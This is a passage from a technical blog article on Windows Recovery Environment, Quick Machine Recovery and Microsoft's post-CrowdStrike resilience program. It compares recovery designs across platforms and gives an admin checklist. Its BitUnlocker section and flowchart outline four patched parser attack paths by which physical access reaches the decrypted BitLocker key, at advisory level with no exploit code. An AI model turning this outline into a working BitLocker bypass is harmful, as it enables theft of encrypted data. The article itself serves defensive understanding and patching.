      CHR_BOOTA[ROOT-A] --&amp;gt; CHR_FALLBACK[Boot loader falls back to other root]
      CHR_BOOTB[ROOT-B] --&amp;gt; CHR_FALLBACK
    end
    subgraph OS[Linux atomic / OSTree]
      OS_DEPNEW[New deployment] --&amp;gt; OS_PRIOR[Prior deployment retained for rollback]
    end
&lt;h3&gt;A head-to-head comparison&lt;/h3&gt;
&lt;p&gt;The dimensions that matter are: year shipped, in-recovery network capability, auto-remediation, signed-but-faulty-driver protection, per-device operator cost during a fleet event, trust floor, and encrypted-volume recovery story.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Dimension&lt;/th&gt;
&lt;th&gt;Windows WinRE + QMR&lt;/th&gt;
&lt;th&gt;Apple SSV + recoveryOS&lt;/th&gt;
&lt;th&gt;ChromeOS A/B + verified boot&lt;/th&gt;
&lt;th&gt;Linux atomic (OSTree)&lt;/th&gt;
&lt;th&gt;Conventional Linux&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Year shipped&lt;/td&gt;
&lt;td&gt;WinRE 2007 [@wiki-winre]; QMR 2025 [@ms-qmr]&lt;/td&gt;
&lt;td&gt;SSV 2020; recoveryOS / 1TR 2020 [@apple-ssv, @apple-boot]&lt;/td&gt;
&lt;td&gt;Verified Boot 2010 [@chromium-verified-boot]&lt;/td&gt;
&lt;td&gt;OSTree 2012 (dev started 2011); rpm-ostree later [@ostree-atomic, @fedora-silverblue]&lt;/td&gt;
&lt;td&gt;dracut 2009; GRUB 2 2009&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;In-recovery network capability&lt;/td&gt;
&lt;td&gt;Yes (WPA/WPA2 Wi-Fi or wired) [@ms-qmr]&lt;/td&gt;
&lt;td&gt;Yes for reinstall; no targeted remediation&lt;/td&gt;
&lt;td&gt;Yes for recovery image fetch&lt;/td&gt;
&lt;td&gt;No standard pipeline&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Auto-remediation without operator&lt;/td&gt;
&lt;td&gt;Yes (one-time or looped) [@ms-qmr]&lt;/td&gt;
&lt;td&gt;No (user confirms reinstall)&lt;/td&gt;
&lt;td&gt;Yes (boot loader fallback) [@chromium-autoupdate]&lt;/td&gt;
&lt;td&gt;No (user selects rollback in GRUB)&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Protection against signed-but-faulty drivers&lt;/td&gt;
&lt;td&gt;Behavioural via MVI 3.0 SDP + user-mode AV [@ms-mvi, @ms-wri-jun-2025]&lt;/td&gt;
&lt;td&gt;DriverKit / System Extensions push third parties out of kernel&lt;/td&gt;
&lt;td&gt;A/B rollback auto-recovers in one boot cycle&lt;/td&gt;
&lt;td&gt;Layered package rolls back with deployment&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Per-device operator cost in a fleet event&lt;/td&gt;
&lt;td&gt;O(1) -- publish remediation once&lt;/td&gt;
&lt;td&gt;O(N) -- each user reinstalls&lt;/td&gt;
&lt;td&gt;O(0) -- automatic per device&lt;/td&gt;
&lt;td&gt;O(N) -- each user selects rollback&lt;/td&gt;
&lt;td&gt;O(N) -- skilled operator per device&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Trust floor (unrecoverable without external media)&lt;/td&gt;
&lt;td&gt;Corrupted &lt;code&gt;bootmgfw.efi&lt;/code&gt;, missing WinRE, lost BitLocker key&lt;/td&gt;
&lt;td&gt;Failed 1TR (very rare)&lt;/td&gt;
&lt;td&gt;Both root partitions plus EEPROM corrupted&lt;/td&gt;
&lt;td&gt;GRUB unreachable&lt;/td&gt;
&lt;td&gt;GRUB unreachable&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Encrypted-volume recovery story&lt;/td&gt;
&lt;td&gt;BitLocker recovery key required [@ms-qmr]&lt;/td&gt;
&lt;td&gt;FileVault key required if at-rest read needed&lt;/td&gt;
&lt;td&gt;Stateful partition holds user data only&lt;/td&gt;
&lt;td&gt;LUKS passphrase required&lt;/td&gt;
&lt;td&gt;LUKS passphrase required&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The notable row is the &lt;em&gt;per-device operator cost during a fleet event&lt;/em&gt;. QMR moves Windows from O(N) (pre-WRI) to O(1) (post-WRI). ChromeOS was already at O(0) thanks to the A/B rollback. Apple, conventional Linux, and OSTree-based Linux remain at O(N).&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The per-device operator cost row is the one Microsoft engineered WRI to change. QMR moves Windows from O(N) to O(1). ChromeOS was already at O(0) by virtue of A/B rollback. Apple, conventional Linux, and OSTree-based Linux remain at O(N). This is the empirical justification for the thesis that resilience is a security property: pre-WRI Windows, despite shipping BitLocker, &lt;a href=&quot;https://paragmali.com/blog/wdac--hvci-code-integrity-at-every-layer-in-windows/&quot; rel=&quot;noopener&quot;&gt;HVCI&lt;/a&gt;, and Secure Boot, had a &lt;em&gt;recoverability complexity class&lt;/em&gt; worse than ChromeOS. A faulty signed driver could exploit that gap to deny service at fleet scale.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Three vendors got to fleet-scale recovery earlier. Microsoft&apos;s catch-up move is constrained by what Microsoft does not control: OEM partition layouts, BIOS/UEFI variance, BitLocker key escrow.Apple ships hardware-plus-OS and Google ships ChromeOS against an OEM-certified hardware spec, both of which let those vendors specify partition layout end to end. Microsoft ships the OS and asks OEMs to follow the Image Configuration Designer defaults; some do, some do not. The KB5028997 workaround for &quot;recovery partition too small for new winre.wim&quot; is precisely the artefact of Microsoft &lt;em&gt;not&lt;/em&gt; being able to mandate the layout [@ms-winre-tech-ref, @ms-kb5028997]. Those constraints set hard limits on what WRI can fix, and they are the reason the trust-floor row in the table is longer for Windows than for ChromeOS.&lt;/p&gt;
&lt;h2&gt;9. Theoretical Limits and the BitUnlocker Counter-Current&lt;/h2&gt;
&lt;p&gt;Two well-known results from the systems and security literature say that no fielded recovery primitive can be perfect, and Microsoft&apos;s own offensive-research team demonstrated, at Black Hat USA 2025 in August 2025, exactly which limit WRI runs into [@alon-leviev].&lt;/p&gt;
&lt;h3&gt;The trust-floor lower bound&lt;/h3&gt;
&lt;p&gt;No system can recover from corruption of &lt;em&gt;all&lt;/em&gt; of its boot-path code without external media, because the verification step that detects corruption is itself part of the boot-path code. ChromeOS encodes this with a write-protected EEPROM that an attacker cannot rewrite without a hardware write-protect override [@chromium-verified-boot]; Apple encodes it with the 1TR environment anchored in the Secure Enclave [@apple-boot]; Windows encodes it by requiring the EFI System Partition plus a signed &lt;code&gt;bootmgfw.efi&lt;/code&gt;. Below that floor, QMR, OSTree, and APFS snapshots are all helpless. The recovery surface bounded by what fits in write-protected non-volatile storage is the lower bound on automated recovery.&lt;/p&gt;
&lt;h3&gt;The end-to-end argument applied to recovery&lt;/h3&gt;
&lt;p&gt;Saltzer, Reed, and Clark&apos;s 1984 &lt;em&gt;End-to-End Arguments in System Design&lt;/em&gt; [@saltzer-reed-clark-1984] argued that correctness checks belong at the endpoints of a communication system, not in intermediate nodes. Applied to update pipelines, the argument predicts that &lt;em&gt;bug-free updates cannot be guaranteed by intermediate nodes&lt;/em&gt; (the vendor&apos;s QA fleet, the CDN, the Windows Update service). Correctness can only be observed at the endpoint. The corollary is that the probability of a faulty update reaching production cannot be driven to zero by any amount of pre-release testing; the platform&apos;s design must instead bound &lt;em&gt;blast radius&lt;/em&gt; and &lt;em&gt;time-to-recovery&lt;/em&gt; of the faulty updates that will inevitably ship. MVI 3.0&apos;s SDP bounds the first (deployment rings); QMR bounds the second (network-reachable remediation). The argument is identical to the canary / progressive-rollout pattern in Google&apos;s SRE Book Release Engineering chapter [@sre-release-eng].&lt;/p&gt;
&lt;h3&gt;The attack-surface trade-off&lt;/h3&gt;
&lt;p&gt;An auto-unlocking, network-reachable recovery environment expands the Trusted Computing Base. Every additional capability added to the recovery path is a new code path; a new code path is a new attack vector. The BitUnlocker research, by Netanel Ben Simon and Alon Leviev at Microsoft&apos;s Security Testing and Offensive Research (STORM) team [@alon-leviev, @ms-bitunlocker-blog], is the most pointed evidence we have that the trade-off is real.&lt;/p&gt;

STORM -- Security Testing and Offensive Research at Microsoft -- is the internal red team. Their job is to break Microsoft products before someone else does. BitUnlocker was first presented at Black Hat USA 2025 and DEF CON 33, both in August 2025; the four CVEs were patched in the July 8, 2025 cumulative update, ahead of the disclosure [@alon-leviev, @ms-bitunlocker-blog]. The patches landed one Patch Tuesday cycle before QMR went generally available [@ms-wri-ignite-2025]. In the same summer, the same vendor that made WinRE reachable from Windows Update made WinRE harder to abuse.

The set of hardware, firmware, and software components on which a system&apos;s security policy ultimately depends. A bug in a TCB component can undermine the entire security policy; everything outside the TCB is, by definition, untrusted relative to it. Recovery environments expand the TCB because they need privileged access to encrypted user state.
&lt;p&gt;The four BitUnlocker CVEs are all rated CVSS 6.8:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;CVE-2025-48804&lt;/strong&gt; [@ms-bitunlocker-blog] -- BitLocker Security Feature Bypass via &lt;code&gt;boot.sdi&lt;/code&gt; parsing.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;CVE-2025-48003&lt;/strong&gt; [@ms-bitunlocker-blog] -- BitLocker Security Feature Bypass via &lt;code&gt;SetupPlatform.exe&lt;/code&gt; / Shift+F10 abuse during the WinRE Apps Scheduled Operation.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;CVE-2025-48800&lt;/strong&gt; [@ms-bitunlocker-blog] -- BitLocker Security Feature Bypass via &lt;code&gt;tttracer.exe&lt;/code&gt; abuse during Offline Scanning.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;CVE-2025-48818&lt;/strong&gt; [@ms-bitunlocker-blog] -- BitLocker Security Feature Bypass via BCD parsing in the Online PBR exploit chain; the fourth pillar of the chain.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The published Microsoft Security blog post on BitUnlocker enumerates the architectural attack surfaces verbatim under three section headings: &lt;em&gt;Attacking Boot.sdi Parsing&lt;/em&gt;, &lt;em&gt;Attacking ReAgent.xml Parsing&lt;/em&gt;, and &lt;em&gt;Attacking Boot Configuration Data (BCD) Parsing&lt;/em&gt; [@ms-bitunlocker-blog]. The premise is the same in every case. WinRE must read the OS volume&apos;s BitLocker recovery material to perform repairs. Therefore WinRE has code paths that, given the right inputs, can obtain the decrypted Full Volume Encryption Key. The four CVEs each find a parser or debugger inside WinRE whose input handling can be steered by an attacker with brief physical access to flip the recovery flow into a state where the decrypted FVEK becomes reachable.&lt;/p&gt;

flowchart TD
    PA[Physical access foothold] --&amp;gt; SDI[Attacking boot.sdi parsing -- CVE-2025-48804]
    PA --&amp;gt; RA[Attacking ReAgent.xml / SetupPlatform.exe -- CVE-2025-48003]
    PA --&amp;gt; BCD[Attacking BCD parsing / Online PBR -- CVE-2025-48818]
    PA --&amp;gt; TT[Abusing tttracer.exe Offline Scanning -- CVE-2025-48800]
    SDI --&amp;gt; FVEK[Reach decrypted FVEK on OS volume]
    RA --&amp;gt; FVEK
    BCD --&amp;gt; FVEK
    TT --&amp;gt; FVEK
    FVEK --&amp;gt; EX[BitLocker bypass; data exfiltration]
&lt;h3&gt;The encrypted-volume impossibility&lt;/h3&gt;
&lt;p&gt;Unattended recovery of an encrypted volume &lt;em&gt;without the key&lt;/em&gt; is impossible. It is a security correctness requirement, not a limitation that engineering can fix. QMR explicitly does not bypass BitLocker [@ms-qmr]. Apple&apos;s FileVault, ChromeOS&apos;s TPM-bound user partition, and Linux LUKS all share this property; none of them gets to be exempt from the requirement that the key be present somewhere before the encrypted volume can be modified offline.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Every additional capability added to the recovery path is an additional attack vector against the encrypted user state that the recovery path is privileged to access. QMR&apos;s network reachability is a feature for the operator and a feature for the attacker. The article&apos;s thesis is not &lt;em&gt;WRI makes Windows safer in absolute terms&lt;/em&gt;; it is &lt;em&gt;WRI moves the trade-off to a different curve&lt;/em&gt;. The same vendor making the recovery surface reachable from Windows Update is the vendor that has to harden it against itself.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;The upper bound&lt;/h3&gt;
&lt;p&gt;ChromeOS A/B auto-rollback recovers a single device in one reboot cycle without operator action [@chromium-autoupdate]. This is the empirical upper bound on automation. No fielded platform recovers a signed-but-faulty boot path faster than one reboot per device. QMR matches the ChromeOS upper bound in the steady state once a remediation is published; the only thing QMR cannot do that ChromeOS does is recover from the &lt;em&gt;first&lt;/em&gt; signed-but-faulty update before Microsoft has authored the remediation. The lower bound on time-to-fleet-recovery is set by the production lead time of Microsoft&apos;s own QA pipeline plus the time to author and publish the targeted patch.&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s own offensive-research team published the BitUnlocker chain one Patch Tuesday before QMR went generally available. That is not a coincidence; it is the price of moving WinRE up the trust ladder. The next question -- what has not been priced yet? -- belongs in the open-problems list.&lt;/p&gt;
&lt;h2&gt;10. Open Problems: Where Microsoft Has Not Committed&lt;/h2&gt;
&lt;p&gt;WRI is a current commitment with a published roadmap. The roadmap has explicit holes. Each of the six below is documented from a primary Microsoft source -- either by what the source &lt;em&gt;says&lt;/em&gt; or, in the most honest cases, by what it &lt;em&gt;does not say&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Network protocol surface in WinRE.&lt;/strong&gt; The Microsoft Learn QMR page is explicit: only wired Ethernet and WPA/WPA2 password-based Wi-Fi are supported as of November 2025 [@ms-qmr]. Enterprise 802.1X and WPA3-Enterprise with device certificates are committed in the November 18, 2025 update as &lt;em&gt;coming soon&lt;/em&gt; under the &lt;em&gt;Wi-Fi 7 for Enterprise&lt;/em&gt; and WinRE-reads-from-Windows lines, but no shipping date is published [@ms-wri-ignite-2025]. For an enterprise on 802.1X, this is the most visible gap: a managed-fleet device on a corporate SSID cannot reach Windows Update from inside WinRE today.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Safe-mode hardening as a discrete deliverable.&lt;/strong&gt; The phrase &quot;safe mode hardening&quot; has no first-party Microsoft anchor as a discrete WRI deliverable. The closest documented item is &lt;a href=&quot;https://paragmali.com/blog/adminless-how-windows-finally-made-elevation-a-security-boun/&quot; rel=&quot;noopener&quot;&gt;&lt;em&gt;Administrator Protection&lt;/em&gt;&lt;/a&gt;, announced in the November 19, 2024 Ignite blog as a constraint on elevated-context behaviour [@ms-wri-ignite-2024]. That is not the same thing. The Safe Mode boot path that the CrowdStrike incident used to delete &lt;code&gt;C-00000291*.sys&lt;/code&gt; was the &lt;em&gt;same&lt;/em&gt; Safe Mode boot path that has existed since Windows NT; nothing in the WRI primary sources commits to changing what Safe Mode does or does not load. Honest reading: WRI re-prices the recovery surface around Safe Mode; it does not (yet) change Safe Mode itself.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Cross-vendor partition layout.&lt;/strong&gt; The Microsoft Learn WinRE Technical Reference [@ms-winre-tech-ref] documents the recommended ICD-media layout but does not enforce it. Clean Windows Setup, OEM-installed Windows, and ICD-media-installed Windows produce different recovery-partition layouts, and the existence of KB5028997 (the well-known workaround for &quot;recovery partition too small for the new &lt;code&gt;winre.wim&lt;/code&gt;&quot;) is a direct consequence. ChromeOS and macOS do not have this problem because Google and Apple control the layout end to end. Microsoft chose, decades ago, not to.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Third-party MDM support for the WinRE plug-in model.&lt;/strong&gt; The November 18, 2025 update describes the WinRE plug-in model as third-party-MDM-adoptable, but no third-party MDM vendor had shipped a plug-in or a QMR management surface as of that announcement [@ms-wri-ignite-2025]. Customers on JAMF, Workspace ONE, Tanium, or similar do not yet have a documented integration path. If the future of recovery is Intune-coupled, WRI&apos;s reach is bounded by Intune adoption.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;BitLocker key escrow as a WRI deliverable.&lt;/strong&gt; No WRI primary source ([@ms-wri-ignite-2024, @ms-wri-jun-2025, @ms-wri-ignite-2025]) names &quot;BitLocker recovery key flows&quot; as a discrete WRI deliverable. The adjacent items are: &lt;em&gt;hardware-accelerated BitLocker&lt;/em&gt; on new devices starting spring 2026 [@ms-wri-ignite-2025]; the BitUnlocker CVE patches in July 2025 [@ms-bitunlocker-blog]; and the Entra ID self-service BitLocker recovery flow at &lt;code&gt;aka.ms/aadrecoverykey&lt;/code&gt; [@ms-kb5042421]. The current state is that BitLocker key escrow is an Entra ID and Intune feature, not a WRI feature. QMR&apos;s value is bounded by BitLocker key availability for the encrypted-volume fraction of any fleet; a WRI deliverable that improved key escrow would compound QMR&apos;s benefit. None has been announced.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Recovery in air-gapped and sovereign environments.&lt;/strong&gt; QMR routes through Windows Update. Air-gapped fleets, sovereign-cloud customers, and offline manufacturing networks cannot reach Windows Update from WinRE. The November 18, 2025 update mentions Connected Cache, but no QMR-Connected-Cache integration is committed [@ms-wri-ignite-2025]. For the high-assurance customer who today does not let manufacturing endpoints talk to the public Internet at all, QMR is a feature for someone else.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The six items above are gaps in the &lt;em&gt;roadmap&lt;/em&gt;, anchored either by what Microsoft has explicitly named as coming-soon or by the absence of a primary source. They are not features. The article distinguishes Microsoft-committed deliverables (cited to a primary source) from adjacent inferences. Readers reviewing WRI for their own fleets should do the same.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;These six gaps are where the next year of WRI roadmap will be argued. None of them is closed; some are closed-soon. For the practitioner, the immediate question is what to do, today, with what is shipping right now.&lt;/p&gt;
&lt;h2&gt;11. Practitioner&apos;s Guide&lt;/h2&gt;
&lt;p&gt;Everything above is architecture. This section is the checklist.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;1. Verify WinRE is provisioned.&lt;/strong&gt; Run &lt;code&gt;reagentc /info&lt;/code&gt; from an elevated prompt. The output should say &lt;code&gt;Windows RE status: Enabled&lt;/code&gt; and point at a sensible WinRE location -- typically &lt;code&gt;\?\GLOBALROOT\device\harddisk0\partitionN\Recovery\WindowsRE&lt;/code&gt; or &lt;code&gt;C:\Windows\System32\Recovery\WindowsRE&lt;/code&gt;. If the status is &lt;code&gt;Disabled&lt;/code&gt;, run &lt;code&gt;reagentc /enable&lt;/code&gt;. If the recovery partition is too small for a new &lt;code&gt;winre.wim&lt;/code&gt; (a known issue surfacing with cumulative updates that grow the image, surfaced as a System event ID 4502 with &lt;code&gt;ErrorPhase 2&lt;/code&gt;), follow KB5028997 [@ms-kb5028997, @ms-winre-tech-ref].&lt;/p&gt;

The mitigation, in outline: disable WinRE temporarily (`reagentc /disable`); shrink the OS partition via `diskpart` by enough megabytes (250 MB minimum per Microsoft&apos;s published procedure) to host a larger recovery partition; recreate the recovery partition with the GPT Type ID `DE94BBA4-06D1-4D40-A16A-BFD50179D6AC` and the GPT attributes value `0x8000000000000001` that hides it from automounting; re-enable WinRE (`reagentc /enable`) so the new `winre.wim` is copied into the resized partition. The Microsoft Support KB article carries the exact `diskpart` commands [@ms-kb5028997], with the Windows RE Technical Reference as the architectural anchor [@ms-winre-tech-ref]. Test on a representative device first; the resize is not reversible without re-imaging.
&lt;p&gt;&lt;strong&gt;2. Audit your QMR posture before turning it on.&lt;/strong&gt; On Enterprise, Education, and managed Pro, cloud remediation is &lt;em&gt;off&lt;/em&gt; by default [@ms-qmr]. Decide first; ring second; roll out third. The Intune Settings Catalog path is &lt;em&gt;Remote Remediation &amp;gt; Enable Cloud Remediation&lt;/em&gt;. Pre-stage a WPA/WPA2 Wi-Fi credential via &lt;code&gt;reagentc.exe /SetRecoverySettings&lt;/code&gt; if your recovery network is wireless.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;3. Use the test-mode dry run.&lt;/strong&gt; &lt;code&gt;reagentc.exe /SetRecoveryTestmode&lt;/code&gt; followed by &lt;code&gt;reagentc.exe /BootToRe&lt;/code&gt; triggers a &lt;em&gt;simulated&lt;/em&gt; QMR cycle. The simulated remediation appears in Settings &amp;gt; Windows Update &amp;gt; Update history rather than mutating the production OS. Run it on a pilot ring before depending on QMR in a real incident [@ms-qmr].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;4. Plan for BitLocker key availability.&lt;/strong&gt; Ensure recovery keys are escrowed to Entra ID, not just printed on a card in a drawer. Enable the Entra ID self-service flow at &lt;code&gt;aka.ms/aadrecoverykey&lt;/code&gt; so an unattended user can retrieve their own key during an incident [@ms-kb5042421].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;5. Know the difference between Cloud Reset, QMR, and Autopilot Reset.&lt;/strong&gt; Cloud Reset (in-Windows &lt;em&gt;Reset this PC &amp;gt; Cloud download&lt;/em&gt;) reinstalls a running OS [@ms-pbr-overview]. QMR runs in WinRE &lt;em&gt;before&lt;/em&gt; the OS boots, applying targeted patches from Windows Update [@ms-qmr]. Autopilot Reset re-provisions a &lt;em&gt;bootable&lt;/em&gt; device via Intune. Three different tools, three different scenarios; do not confuse them in your runbook.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;6. Watch for the November 2025 Intune signals.&lt;/strong&gt; Once Intune surfaces WinRE state in the admin centre, build the muscle of looking for it. The roll-up that tells you &quot;12 devices are in WinRE right now&quot; is the operational primitive Microsoft did not have through July 2024 [@ms-wri-ignite-2025].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Promote step 3 (the test-mode dry run) into your incident-response runbook now [@ms-qmr]. The time to discover that the recovery Wi-Fi SSID changed last quarter is not in the middle of a fleet-down event.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; QMR cannot decrypt the OS volume. It applies Windows Update patches that take effect on the next boot, but it cannot run against an encrypted volume&apos;s contents without the BitLocker recovery key being available [@ms-qmr]. If a device&apos;s BitLocker key is not escrowed to Entra ID and the user is not available to read it from a printout, QMR cannot help. Key escrow is upstream of recovery; treat it that way.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The &lt;code&gt;reagentc /info&lt;/code&gt; output is short and uniform enough that a small script can classify the device&apos;s WinRE health. The block below sketches one in JavaScript pseudocode.&lt;/p&gt;
&lt;p&gt;{`
// reagentc /info is a small, deterministic text block. Parse it.&lt;/p&gt;
&lt;p&gt;const sampleOutput = `
Windows Recovery Environment (Windows RE) and system reset configuration
Information:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Windows RE status:         Enabled
Windows RE location:       \\\\?\\\\GLOBALROOT\\\\device\\\\harddisk0\\\\partition4\\\\Recovery\\\\WindowsRE
Boot Configuration Data (BCD) identifier: a1b2c3d4-...-winre-guid
Recovery image location:
Recovery image index:      0
Custom image location:
Custom image index:        0
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;REAGENTC.EXE: Operation Successful.
`;&lt;/p&gt;
&lt;p&gt;function classify(output) {
  const status = /Windows RE status:\s+(\w+)/.exec(output)?.[1];
  const location = /Windows RE location:\s+(\S+)/.exec(output)?.[1] || &apos;&apos;;
  const partitionMatch = /partition(\d+)\\Recovery\\WindowsRE/.exec(location);
  const onPartition = !!partitionMatch;
  const onOsVolume = /^[A-Z]:\\Recovery\\WindowsRE/.test(location);&lt;/p&gt;
&lt;p&gt;  if (status !== &apos;Enabled&apos;) {
    return { status, action: &apos;reagentc /enable -- WinRE is not active&apos; };
  }
  if (!onPartition &amp;amp;&amp;amp; !onOsVolume) {
    return { status, action: &apos;Unknown layout; verify with diskpart and reagentc&apos; };
  }
  if (onPartition) {
    return {
      status,
      layout: &apos;recovery-partition&apos;,
      partition: partitionMatch[1],
      note: &apos;If cumulative updates fail with insufficient-space errors, see KB5028997&apos;,
    };
  }
  return { status, layout: &apos;os-volume-recovery-folder&apos;, note: &apos;OEM-style layout; some Intune&apos; +
    &apos; policies assume a separate partition. Confirm before relying on remote remediation.&apos; };
}&lt;/p&gt;
&lt;p&gt;console.log(classify(sampleOutput));
`}&lt;/p&gt;
&lt;p&gt;The practical questions answered, the article closes with a set of FAQs that catch the common misconceptions.&lt;/p&gt;
&lt;h2&gt;12. Frequently Asked Questions and Closing Thoughts&lt;/h2&gt;


No. WRI&apos;s *Windows endpoint security platform* gives MVI partners a user-mode runtime so their detection logic does not have to live in a kernel-mode `.sys` file [@ms-wri-jun-2025, @ms-wri-ignite-2025]. Kernel-mode drivers as a class are not retired: the November 18, 2025 update is explicit that &quot;graphics drivers, for example, will continue to run in kernel mode for performance reasons&quot; [@ms-wri-ignite-2025], and the driver-resiliency playbook (compiler safeguards, driver isolation, DMA-remapping, higher signing bar) is precisely for the kernel-mode surface that will remain.


No. The Microsoft Learn QMR page is explicit that the recovery flow does not decrypt the OS volume [@ms-qmr]. If the BitLocker recovery key is unavailable, QMR cannot help. The recommended escrow path is Entra ID, with the user-facing self-service flow at `aka.ms/aadrecoverykey` [@ms-kb5042421].


No. The BCD Boot Options Reference enumerates every legal element on a boot entry, and there is no `/recovery` flag on `winload.efi` or `winload.exe` [@ms-bcd]. WinRE is selected by following the `recoverysequence` element of the OS-loader entry to a separate BCD entry whose `winpe` is `Yes` and whose `osdevice` mounts `winre.wim` from a `boot.sdi`-backed RAM disk. The entire handoff is inside the boot manager, before `winload.efi` runs.


No. The four CVE-2025-48800/-48003/-48804/-48818 advisories were patched in the July 8, 2025 cumulative update before QMR went generally available in August 2025 [@ms-bitunlocker-blog, @ms-wri-ignite-2025]. The patches addressed parser and debugger code paths inside WinRE; they did not remove WinRE&apos;s ability to read the OS volume&apos;s BitLocker recovery material, which is a feature WinRE needs in order to perform any repair on an encrypted volume.


No. The Secure Future Initiative (SFI), announced in November 2023, is Microsoft&apos;s company-wide security program. WRI is the Windows-specific workstream inside SFI that owns Windows availability, kernel resilience, and the recovery surface; the published WRI blogs frame it as the Windows pillar of SFI rather than a stand-alone effort [@ms-wri-ignite-2024, @ms-wri-jun-2025].


QMR will not connect. The Microsoft Learn page is explicit that only wired Ethernet and WPA/WPA2 password-based Wi-Fi are supported [@ms-qmr]. The November 18, 2025 update commits to WPA3-Enterprise with device certificates as part of the WinRE-reads-from-Windows networking work and the *Wi-Fi 7 for Enterprise* line, but it does not give a shipping date [@ms-wri-ignite-2025]. For now, enterprises whose recovery story depends on QMR over Wi-Fi must either stand up a dedicated WPA2-PSK recovery SSID or rely on wired recovery.


The code is mostly the same. What changed is the *policy* that lets WinRE call Windows Update without an operator at the keyboard. WinPE has shipped networking drivers since 2002 [@ms-winpe-intro], and `winre.wim` has been bootable from a recovery partition since 2009. The breakthrough is the commitment that the recovery environment is allowed to phone home -- and the surrounding program (MVI 3.0, the user-mode AV platform, Intune visibility) that makes it usable as a fleet-scale primitive.

&lt;h3&gt;Closing&lt;/h3&gt;
&lt;p&gt;The Windows Recovery Environment that worked perfectly on July 19, 2024 is the same Windows Recovery Environment that became Microsoft&apos;s most important security surface on August 1, 2025. The architecture did not change in the year between. The question we ask of it did.&lt;/p&gt;
&lt;p&gt;The CrowdStrike incident did not invent the case for resilience as a security property. It priced it. Two months after the bug check signature &lt;code&gt;csagent+0xe14ed&lt;/code&gt; made the rounds, Microsoft and the MVI cohort sat down at WESES to argue out what would become MVI 3.0 [@ms-weses]. Three months after that, the Ignite 2024 keynote committed to Quick Machine Recovery and to a user-mode antimalware platform [@ms-wri-ignite-2024]. Five months after &lt;em&gt;that&lt;/em&gt;, the first QMR code shipped on the Beta Channel [@ms-qmr-insider-mar2025]. Twelve months after the incident, MVI 3.0 was binding [@ms-wri-ignite-2025]. Thirteen months after, QMR went generally available -- and BitUnlocker had been patched a month earlier in the July 2025 cumulative update. Sixteen months after, Microsoft published the rebuild-without-shipping-hardware roadmap [@ms-wri-ignite-2025].&lt;/p&gt;
&lt;p&gt;WRI does not eliminate the trade-off between recoverability and attack surface. It moves the trade-off to a curve where the per-device cost of a fleet-down event is not bounded by human attention, and where the recovery code path is hardened by the same vendor&apos;s offensive-research team. Those are different curves than the ones the platform was on in July 2024. They are not the curves a textbook chapter on Windows internals would have predicted in 2014. They are also still the curves of a single vendor&apos;s program, anchored on a small number of blog posts and Microsoft Learn pages, and the work of validating them belongs in every fleet that depends on Windows for availability.&lt;/p&gt;
&lt;p&gt;If WinRE worked perfectly on July 19, 2024 and that was the problem, the test of WRI is whether the next &lt;em&gt;July 19, 2026&lt;/em&gt; never makes the news.&lt;/p&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;windows-recovery-environment-and-the-post-crowdstrike-resilience-initiative&quot; keyTerms={[
  { term: &quot;WinRE&quot;, definition: &quot;Windows Recovery Environment. A Windows Preinstallation Environment image (winre.wim) that the Windows Boot Manager loads on recovery triggers.&quot; },
  { term: &quot;winre.wim&quot;, definition: &quot;The customised WinPE image that contains the recovery shell, Startup Repair, System Restore (when enabled), and the curated WinPE Optional Components.&quot; },
  { term: &quot;boot.sdi&quot;, definition: &quot;A System Deployment Image file used by bootmgr as a container for the RAM disk into which winre.wim is mounted at boot.&quot; },
  { term: &quot;ReAgentC&quot;, definition: &quot;The in-box management tool for WinRE: /info, /enable, /disable, /setreimage, /boottore, /setbootshelllink, and the WinRE-test-mode subcommands.&quot; },
